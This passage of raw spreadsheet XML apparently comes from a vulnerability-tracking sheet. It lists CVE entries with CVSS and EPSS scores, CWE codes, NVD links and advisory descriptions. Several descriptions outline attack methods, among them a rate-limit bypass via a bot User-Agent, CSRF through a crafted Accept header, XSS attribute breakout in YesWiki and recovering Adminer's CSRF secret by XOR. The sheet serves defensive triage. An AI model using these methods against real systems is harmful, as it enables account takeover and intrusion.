t="inlineStr"><is><t>NVD</t></is></c><c r="O1761" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1761" s="5" t="inlineStr" /><c r="Q1761" s="5" t="inlineStr"><is><t>CWE-307</t></is></c><c r="R1761" s="5" t="inlineStr"><is><t>AVideo API fails to enforce rate limits when clients send a bot User-Agent header, allowing attackers to bypass all eight protected operations including login brute-force protection. Attackers can send requests with a bot User-Agent to disable rate limiting and perform unlimited password guessing attempts against any account from a single IP address.</t></is></c><c r="S1761" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86186</t></is></c></row><row r="1762"><c r="A1762" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1762" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1762" s="5" t="inlineStr"><is><t>CVE-2026-86590</t></is></c><c r="D1762" s="5" t="n"><v>6.3</v></c><c r="E1762" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1762" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G1762" s="5" t="inlineStr" /><c r="H1762" s="5" t="n"><v>0.004</v></c><c r="I1762" s="5" t="inlineStr" /><c r="J1762" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1762" s="5" t="inlineStr" /><c r="L1762" s="5" t="inlineStr" /><c r="M1762" s="5" t="inlineStr" /><c r="N1762" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1762" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1762" s="5" t="inlineStr" /><c r="Q1762" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1762" s="5" t="inlineStr"><is><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is></c><c r="S1762" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t></is></c></row><row r="1763"><c r="A1763" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1763" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1763" s="5" t="inlineStr"><is><t>CVE-2026-18874</t></is></c><c r="D1763" s="5" t="n"><v>6.2</v></c><c r="E1763" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1763" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1763" s="5" t="inlineStr" /><c r="H1763" s="5" t="n"><v>0.004</v></c><c r="I1763" s="5" t="inlineStr" /><c r="J1763" s="5" t="inlineStr" /><c r="K1763" s="5" t="inlineStr" /><c r="L1763" s="5" t="inlineStr" /><c r="M1763" s="5" t="inlineStr" /><c r="N1763" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1763" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P1763" s="5" t="inlineStr" /><c r="Q1763" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R1763" s="5" t="inlineStr"><is><t>A flaw was found in volsync-addon-controller. This vulnerability allows an attacker to inject malicious YAML (Yet Another Markup Language) code into the OpenShift Lifecycle Manager (OLM) Subscription resource. This is due to improper escaping of annotation values when they are rendered into YAML. Successful exploitation could lead to unauthorized modification or control over OLM Subscription configurations, potentially impacting software management within the cluster. This issue primarily affects systems where the 'volsync-addon-deploy-type: olm' annotation is explicitly enabled.</t></is></c><c r="S1763" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18874</t></is></c></row><row r="1764"><c r="A1764" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1764" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1764" s="5" t="inlineStr"><is><t>CVE-2026-19795</t></is></c><c r="D1764" s="5" t="n"><v>6.2</v></c><c r="E1764" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1764" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1764" s="5" t="inlineStr" /><c r="H1764" s="5" t="n"><v>0.001</v></c><c r="I1764" s="5" t="inlineStr" /><c r="J1764" s="5" t="inlineStr" /><c r="K1764" s="5" t="inlineStr" /><c r="L1764" s="5" t="inlineStr" /><c r="M1764" s="5" t="inlineStr" /><c r="N1764" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1764" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1764" s="5" t="inlineStr" /><c r="Q1764" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R1764" s="5" t="inlineStr"><is><t>Qiskit could allow a local attacker to cause a denial of service due to a stack overflow during deserialization of QPY payloads. A malicious QPY payload can trigger a segmentation fault, causing the application to crash when deserializing untrusted input.</t></is></c><c r="S1764" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19795</t></is></c></row><row r="1765"><c r="A1765" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1765" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1765" s="5" t="inlineStr"><is><t>CVE-2026-71832</t></is></c><c r="D1765" s="5" t="n"><v>6.2</v></c><c r="E1765" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1765" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1765" s="5" t="inlineStr" /><c r="H1765" s="5" t="n"><v>0.001</v></c><c r="I1765" s="5" t="inlineStr" /><c r="J1765" s="5" t="inlineStr" /><c r="K1765" s="5" t="inlineStr" /><c r="L1765" s="5" t="inlineStr" /><c r="M1765" s="5" t="inlineStr" /><c r="N1765" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1765" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1765" s="5" t="inlineStr" /><c r="Q1765" s="5" t="inlineStr"><is><t>CWE-369</t></is></c><c r="R1765" s="5" t="inlineStr"><is><t>Aria2 version 1.37.0 and below is affected by a Divide By Zero issue in src/bittorrent_helper.cc, which allows a remote malicious user to cause a Denial of Service</t></is></c><c r="S1765" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71832</t></is></c></row><row r="1766"><c r="A1766" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1766" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1766" s="5" t="inlineStr"><is><t>CVE-2026-81859</t></is></c><c r="D1766" s="5" t="n"><v>6.2</v></c><c r="E1766" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1766" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1766" s="5" t="inlineStr" /><c r="H1766" s="5" t="n"><v>0.001</v></c><c r="I1766" s="5" t="inlineStr" /><c r="J1766" s="5" t="inlineStr" /><c r="K1766" s="5" t="inlineStr" /><c r="L1766" s="5" t="inlineStr" /><c r="M1766" s="5" t="inlineStr" /><c r="N1766" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1766" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1766" s="5" t="inlineStr" /><c r="Q1766" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="R1766" s="5" t="inlineStr"><is><t>CP4BA - IBM Enterprise Records could allow a local attacker to obtain sensitive information due to the use of a broken or risky cryptographic algorithm.</t></is></c><c r="S1766" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81859</t></is></c></row><row r="1767"><c r="A1767" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1767" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1767" s="5" t="inlineStr"><is><t>CVE-2026-85547</t></is></c><c r="D1767" s="5" t="n"><v>6.2</v></c><c r="E1767" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1767" s="5" t="inlineStr"><is><t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t></is></c><c r="G1767" s="5" t="inlineStr" /><c r="H1767" s="5" t="n"><v>0.003</v></c><c r="I1767" s="5" t="inlineStr" /><c r="J1767" s="5" t="inlineStr" /><c r="K1767" s="5" t="inlineStr" /><c r="L1767" s="5" t="inlineStr" /><c r="M1767" s="5" t="inlineStr" /><c r="N1767" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1767" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1767" s="5" t="inlineStr" /><c r="Q1767" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R1767" s="5" t="inlineStr"><is><t>A cross-site request forgery (CSRF) vulnerability exists in MISP due to form-security and CSRF protections being disabled based on whether an incoming request was identified as a REST request.

MISP's REST detection can be influenced by request properties such as the URL suffix or the HTTP Accept header. Because Accept: application/json can be supplied by a cross-origin page without requiring a CORS preflight, an attacker could cause a request originating from another website to be treated as REST traffic. MISP would consequently disable its normal form-security and CSRF validation even though the request was authenticated using the victim's existing browser session.

An unauthenticated remote attacker could exploit this behavior by convincing an authenticated MISP user to visit or interact with a malicious web page. The attacker's page could then issue crafted requests to susceptible state-changing MISP endpoints using the victim's privileges. Depending on the permissions of the victim and the targeted endpoint, this could allow unauthorized modification, creation, publication, or removal of data and other state changes.

The vulnerability originates from granting the form-security exemption based on _isRest() rather than on the authentication mechanism used by the request. The patch changes this behavior so that CSRF and form-security exemptions are granted only when the request actually carries a MISP API key. Session-authenticated REST-style requests remain subject to CSRF protection.
The fix also introduces support for transmitting CSRF tokens through the X-CSRF-Token header for legitimate same-origin AJAX requests. Such a header cannot normally be attached by a cross-origin page without triggering a CORS preflight, preventing it from being used to reproduce the original attack.</t></is></c><c r="S1767" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85547</t></is></c></row><row r="1768"><c r="A1768" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1768" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1768" s="5" t="inlineStr"><is><t>CVE-2026-18090</t></is></c><c r="D1768" s="5" t="n"><v>6.1</v></c><c r="E1768" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1768" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1768" s="5" t="inlineStr" /><c r="H1768" s="5" t="n"><v>0.002</v></c><c r="I1768" s="5" t="inlineStr" /><c r="J1768" s="5" t="inlineStr" /><c r="K1768" s="5" t="inlineStr" /><c r="L1768" s="5" t="inlineStr" /><c r="M1768" s="5" t="inlineStr" /><c r="N1768" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1768" s="5" t="inlineStr" /><c r="Q1768" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1768" s="5" t="inlineStr"><is><t>A flaw was found in gdk-pixbuf. This vulnerability allows a remote attacker to cause a heap out-of-bounds read by providing a specially crafted Apple Icon Image (.icns) file. The uncompress() function, which handles RLE-encoded ICNS icon data, fails to validate the source buffer's boundaries during decompression. This can lead to a denial of service, where the application crashes, or to information disclosure, potentially revealing sensitive data from adjacent memory.</t></is></c><c r="S1768" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18090</t></is></c></row><row r="1769"><c r="A1769" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1769" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1769" s="5" t="inlineStr"><is><t>CVE-2026-18330</t></is></c><c r="D1769" s="5" t="n"><v>6.1</v></c><c r="E1769" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1769" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G1769" s="5" t="inlineStr" /><c r="H1769" s="5" t="n"><v>0.002</v></c><c r="I1769" s="5" t="inlineStr" /><c r="J1769" s="5" t="inlineStr" /><c r="K1769" s="5" t="inlineStr" /><c r="L1769" s="5" t="inlineStr" /><c r="M1769" s="5" t="inlineStr" /><c r="N1769" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1769" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1769" s="5" t="inlineStr" /><c r="Q1769" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="R1769" s="5" t="inlineStr"><is><t>A hard-coded
cryptographic key vulnerability exists in the web module of TP-Link Archer
AX55 v4. A LAN attacker who captures an HTTP login session may use the known
shared RSA private key to decrypt the administrator password; the
weakened AES session key further reduces the effort required to
compromise session confidentiality.





Successful
exploitation may disclose the administrator password captured from an HTTP
login session and compromise session confidentiality.</t></is></c><c r="S1769" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18330</t></is></c></row><row r="1770"><c r="A1770" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1770" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1770" s="5" t="inlineStr"><is><t>CVE-2026-18843</t></is></c><c r="D1770" s="5" t="n"><v>6.1</v></c><c r="E1770" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1770" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1770" s="5" t="inlineStr" /><c r="H1770" s="5" t="n"><v>0.002</v></c><c r="I1770" s="5" t="inlineStr" /><c r="J1770" s="5" t="inlineStr" /><c r="K1770" s="5" t="inlineStr" /><c r="L1770" s="5" t="inlineStr" /><c r="M1770" s="5" t="inlineStr" /><c r="N1770" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1770" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1770" s="5" t="inlineStr" /><c r="Q1770" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1770" s="5" t="inlineStr"><is><t>The Beaver Builder Plugin (Starter Version) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'no_results_message' node_preview Parameter in all versions up to, and including, 2.11.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t></is></c><c r="S1770" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18843</t></is></c></row><row r="1771"><c r="A1771" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1771" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1771" s="5" t="inlineStr"><is><t>CVE-2026-19727</t></is></c><c r="D1771" s="5" t="n"><v>6.1</v></c><c r="E1771" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1771" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G1771" s="5" t="inlineStr" /><c r="H1771" s="5" t="n"><v>0.001</v></c><c r="I1771" s="5" t="inlineStr" /><c r="J1771" s="5" t="inlineStr" /><c r="K1771" s="5" t="inlineStr" /><c r="L1771" s="5" t="inlineStr" /><c r="M1771" s="5" t="inlineStr" /><c r="N1771" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1771" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1771" s="5" t="inlineStr" /><c r="Q1771" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1771" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Information and Document Automation Program allows XSS Targeting HTML Attributes.

This issue affects Library Information and Document Automation Program: before v22.2.</t></is></c><c r="S1771" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19727</t></is></c></row><row r="1772"><c r="A1772" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1772" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1772" s="5" t="inlineStr"><is><t>CVE-2026-19872</t></is></c><c r="D1772" s="5" t="n"><v>6.1</v></c><c r="E1772" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1772" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1772" s="5" t="inlineStr" /><c r="H1772" s="5" t="n"><v>0.003</v></c><c r="I1772" s="5" t="inlineStr" /><c r="J1772" s="5" t="inlineStr" /><c r="K1772" s="5" t="inlineStr" /><c r="L1772" s="5" t="inlineStr" /><c r="M1772" s="5" t="inlineStr" /><c r="N1772" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1772" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1772" s="5" t="inlineStr" /><c r="Q1772" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1772" s="5" t="inlineStr"><is><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is></c><c r="S1772" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19872</t></is></c></row><row r="1773"><c r="A1773" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1773" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1773" s="5" t="inlineStr"><is><t>CVE-2026-32773</t></is></c><c r="D1773" s="5" t="n"><v>6.1</v></c><c r="E1773" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1773" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1773" s="5" t="inlineStr" /><c r="H1773" s="5" t="n"><v>0.007</v></c><c r="I1773" s="5" t="inlineStr" /><c r="J1773" s="5" t="inlineStr" /><c r="K1773" s="5" t="inlineStr"><is><t>apache:spark</t></is></c><c r="L1773" s="5" t="inlineStr" /><c r="M1773" s="5" t="inlineStr" /><c r="N1773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1773" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1773" s="5" t="inlineStr" /><c r="Q1773" s="5" t="inlineStr"><is><t>CWE-80</t></is></c><c r="R1773" s="5" t="inlineStr"><is><t>There is a lack of XSS escaping in the Spark History Server prior to 3.5.8 which allows a malicious Spark job to generate arbitrary unescaped frontend code which could lead to a minimal privilege escalation in browser. Users are encouraged to upgrade to Spark 3.5.8 or later.

This CVE is marked as "low" since the path to exploit requires both relatively high permissions (ability to launch a Spark job) and requires tricking a user with higher permissions to log in and visit the Spark history web page.

Users are encouraged to upgrade their Spark history servers to Spark 3.5.8 or later.</t></is></c><c r="S1773" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-32773</t></is></c></row><row r="1774"><c r="A1774" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1774" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1774" s="5" t="inlineStr"><is><t>CVE-2026-52773</t></is></c><c r="D1774" s="5" t="n"><v>6.1</v></c><c r="E1774" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1774" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1774" s="5" t="inlineStr" /><c r="H1774" s="5" t="n"><v>0.005</v></c><c r="I1774" s="5" t="inlineStr" /><c r="J1774" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1774" s="5" t="inlineStr" /><c r="L1774" s="5" t="inlineStr" /><c r="M1774" s="5" t="inlineStr" /><c r="N1774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1774" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1774" s="5" t="inlineStr" /><c r="Q1774" s="5" t="inlineStr"><is><t>CWE-80</t></is></c><c r="R1774" s="5" t="inlineStr"><is><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is></c><c r="S1774" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52773</t></is></c></row><row r="1775"><c r="A1775" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1775" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1775" s="5" t="inlineStr"><is><t>CVE-2026-52774</t></is></c><c r="D1775" s="5" t="n"><v>6.1</v></c><c r="E1775" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1775" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1775" s="5" t="inlineStr" /><c r="H1775" s="5" t="n"><v>0.005</v></c><c r="I1775" s="5" t="inlineStr" /><c r="J1775" s="5" t="inlineStr" /><c r="K1775" s="5" t="inlineStr" /><c r="L1775" s="5" t="inlineStr" /><c r="M1775" s="5" t="inlineStr" /><c r="N1775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1775" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1775" s="5" t="inlineStr" /><c r="Q1775" s="5" t="inlineStr"><is><t>CWE-80</t></is></c><c r="R1775" s="5" t="inlineStr"><is><t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki's Bazar widget handler reflects the id GET parameter into HTML attributes using strip_tags() only. Because strip_tags() does not escape double quotes, an attacker can break out of the attribute value, inject an event handler such as onmouseover, and execute arbitrary JavaScript in the victim's browser. This issue is reachable without authentication. During validation, the vulnerable widget route returned the injected HTML for both /HomePage/widget?id=... and /NoSuchPage/widget?id=..., which shows that no login, no page ownership, no edit rights, and not even a valid page tag were required. The only routing prerequisite observed was that the Bazar extension is enabled and the request includes an id parameter. This issue has been patched in version 4.6.6.</t></is></c><c r="S1775" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52774</t></is></c></row><row r="1776"><c r="A1776" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1776" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1776" s="5" t="inlineStr"><is><t>CVE-2026-56706</t></is></c><c r="D1776" s="5" t="n"><v>6.1</v></c><c r="E1776" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1776" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1776" s="5" t="inlineStr" /><c r="H1776" s="5" t="n"><v>0.003</v></c><c r="I1776" s="5" t="inlineStr" /><c r="J1776" s="5" t="inlineStr" /><c r="K1776" s="5" t="inlineStr" /><c r="L1776" s="5" t="inlineStr" /><c r="M1776" s="5" t="inlineStr" /><c r="N1776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1776" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P1776" s="5" t="inlineStr" /><c r="Q1776" s="5" t="inlineStr"><is><t>CWE-330</t></is></c><c r="R1776" s="5" t="inlineStr"><is><t>Adminer before 5.4.3 uses a CSRF token scheme that transmits both the XOR mask and the masked value in every token (format (rand XOR secret):rand), allowing anyone who observes a single CSRF token (e.g., via network sniffing, log files, Referrer header, or XSS) to recover the session secret with a single XOR operation and forge unlimited valid tokens. The implementation is further weakened by a low-entropy session token (rand(1,1e6), ~20 bits) that permits blind brute-force, and by use of loose comparison (==) in token verification, enabling PHP type juggling. Exploitation enables cross-site request forgery against authenticated sessions, including execution of arbitrary SQL queries.</t></is></c><c r="S1776" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56706</t></is></c></row><row r="1777"><c r="A1777" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1777" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1777" s="5" t="inlineStr"><is><t>CVE-2026-63523</t></is></c><c r="D1777" s="5" t="n"><v>6.1</v></c><c r="E1777" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1777" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1777" s="5" t="inlineStr" /><c r="H1777" s="5" t="n"><v>0.007</v></c><c r="I1777" s="5" t="inlineStr" /><c r="J1777" s="5" t="inlineStr" /><c r="K1777" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1777" s="5" t="inlineStr" /><c r="M1777" s="5" t="inlineStr" /><c r="N1777" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1777" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1777" s="5" t="inlineStr" /><c r="Q1777" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1777" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="S1777" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63523</t></is></c></row><row r="1778"><c r="A1778" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1778" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1778" s="5" t="inlineStr"><is><t>CVE-2026-69642</t></is></c><c r="D1778" s="5" t="n"><v>6.1</v></c><c r="E1778" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1778" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1778" s="5" t="inlineStr" /><c r="H1778" s="5" t="n"><v>0.003</v></c><c r="I1778" s="5" t="inlineStr" /><c r="J1778" s="5" t="inlineStr" /><c r="K1778" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1778" s="5" t="inlineStr" /><c r="M1778" s="5" t="inlineStr" /><c r="N1778" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1778" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1778" s="5" t="inlineStr" /><c r="Q1778" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1778" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="S1778" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69642</t></is></c></row><row r="1779"><c r="A1779" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1779" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1779" s="5" t="inlineStr"><is><t>CVE-2026-71403</t></is></c><c r="D1779" s="5" t="n"><v>6.1</v></c><c r="E1779" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1779" s="5" t="inlineStr"><is><t>meissner@suse.de</t></is></c><c r="G1779" s="5" t="inlineStr" /><c r="H1779" s="5" t="n"><v>0.002</v></c><c r="I1779" s="5" t="inlineStr" /><c r="J1779" s="5" t="inlineStr" /><c r="K1779" s="5" t="inlineStr" /><c r="L1779" s="5" t="inlineStr" /><c r="M1779" s="5" t="inlineStr" /><c r="N1779" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1779" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1779" s="5" t="inlineStr" /><c r="Q1779" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1779" s="5" t="inlineStr"><is><t>A flaw was found in Rancher Manager. The /v3/users update path did not enforce immutability of a User resource's `username` and `principalIds` fields. A user holding the `update` verb on `users.management.cattle.io` could inject a foreign identity provider principal into any account, so that the next login by the owner of that principal was bound to the victim's account and inherited its role bindings.


This issue affects Rancher: before 2.15.1.</t></is></c><c r="S1779" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71403</t></is></c></row><row r="1780"><c r="A1780" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1780" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1780" s="5" t="inlineStr"><is><t>CVE-2026-75586</t></is></c><c r="D1780" s="5" t="n"><v>6.1</v></c><c r="E1780" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1780" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1780" s="5" t="inlineStr" /><c r="H1780" s="5" t="n"><v>0.002</v></c><c r="I1780" s="5" t="inlineStr" /><c r="J1780" s="5" t="inlineStr" /><c r="K1780" s="5" t="inlineStr" /><c r="L1780" s="5" t="inlineStr" /><c r="M1780" s="5" t="inlineStr" /><c r="N1780" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1780" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1780" s="5" t="inlineStr" /><c r="Q1780" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1780" s="5" t="inlineStr"><is><t>The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'formData[id]' Parameter in all versions up to, and including, 2.0.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The front-end AJAX handler is registered on the public 'wp' action with no nonce, capability, or referer check, and the raw attacker-controlled id value is interpolated verbatim into an exception message that is echoed back without escaping; when the response is served as text/html rather than application/json, the browser parses the injected markup.</t></is></c><c r="S1780" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75586</t></is></c></row><row r="1781"><c r="A1781" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1781" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1781" s="5" t="inlineStr"><is><t>CVE-2026-76002</t></is></c><c r="D1781" s="5" t="n"><v>6.1</v></c><c r="E1781" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1781" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1781" s="5" t="inlineStr" /><c r="H1781" s="5" t="n"><v>0.007</v></c><c r="I1781" s="5" t="inlineStr" /><c r="J1781" s="5" t="inlineStr" /><c r="K1781" s="5" t="inlineStr" /><c r="L1781" s="5" 